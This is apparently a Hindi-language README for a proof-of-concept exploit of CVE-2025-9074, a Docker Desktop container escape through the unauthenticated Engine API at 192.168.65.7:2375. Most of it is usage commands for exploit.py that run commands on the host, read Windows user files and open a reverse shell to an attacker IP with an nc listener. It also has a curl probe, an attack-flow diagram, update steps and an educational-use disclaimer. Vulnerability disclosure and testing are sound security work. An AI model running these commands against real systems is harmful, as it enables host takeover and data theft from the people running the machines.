
CVE-2025-9074 के लिए प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट - अनप्रमाणित Docker Engine API कंटेनर एस्केप जो Windows और macOS पर Docker Desktop < 4.44.3 को प्रभावित करता है (CVSS 9.3)
CVE-2025-9074 के लिए प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट - Docker Desktop में एक महत्वपूर्ण कंटेनर एस्केप भेद्यता जो Docker Engine API तक अनधिकृत पहुंच की अनुमति देती है।
| गुण | मान |
|---|---|
| CVE ID | CVE-2025-9074 |
| CVSS स्कोर | 9.3 (गंभीर) |
| प्रभावित सॉफ्टवेयर | Docker Desktop < 4.44.3 |
| प्रभावित प्लेटफॉर्म | Windows, macOS (Linux प्रभावित नहीं) |
| निश्चित संस्करण | Docker Desktop 4.44.3+ |
| खोजकर्ता | Felix Boulet, Philippe Dugré |
| खोज की तिथि | मध्य-2025 |
| पैच तिथि | 20 अगस्त, 2025 |
यह भेद्यता Docker Desktop पर चलने वाले कंटेनरों को http://192.168.65.7:2375 पर Docker Engine API तक प्रमाणीकरण के बिना पहुंचने की अनुमति देती है। यह निम्नलिखित की परवाह किए बिना होता है:
Docker Engine API को एक TCP सॉकेट पर उजागर किया गया था जो कंटेनरों के अंदर से सुलभ था, जिससे अनुमति मिली:
pip3 install requests
# Execute a command on the host
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "whoami"
# Read files from Windows host
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "cat /hostfs/mnt/c/Users/Administrator/Desktop/root.txt"
# List users on Windows
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "ls -la /hostfs/mnt/c/Users"
# Terminal 1: Set up listener
nc -lvnp 4444
# Terminal 2: Execute exploit
python3 exploit.py -u http://192.168.65.7:2375 -m reverse -l <YOUR_IP> -p 4444
# Once connected, host filesystem is at: /hostfs
# If you already have access to a container
curl http://192.168.65.7:2375/version
graph TD
A[Malicious Container] -->|No Auth Required| B[Docker Engine API<br/>192.168.65.7:2375]
B -->|Create Container| C[Privileged Container]
C -->|Mount Host FS| D[Full Host Access]
D -->|Read/Write| E[Compromise System]
तुरंत Docker Desktop 4.44.3 या बाद के संस्करण में अपडेट करें।
# Check your Docker Desktop version
docker --version
# Update Docker Desktop
# Windows: Download from https://desktop.docker.com/win/main/amd64/Docker%20Desktop%20Installer.exe
# macOS: Download from https://desktop.docker.com/mac/main/amd64/Docker.dmg
यदि तत्काल अपडेट संभव नहीं है:
यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
MIT लाइसेंस - विवरण के लिए LICENSE फ़ाइल देखें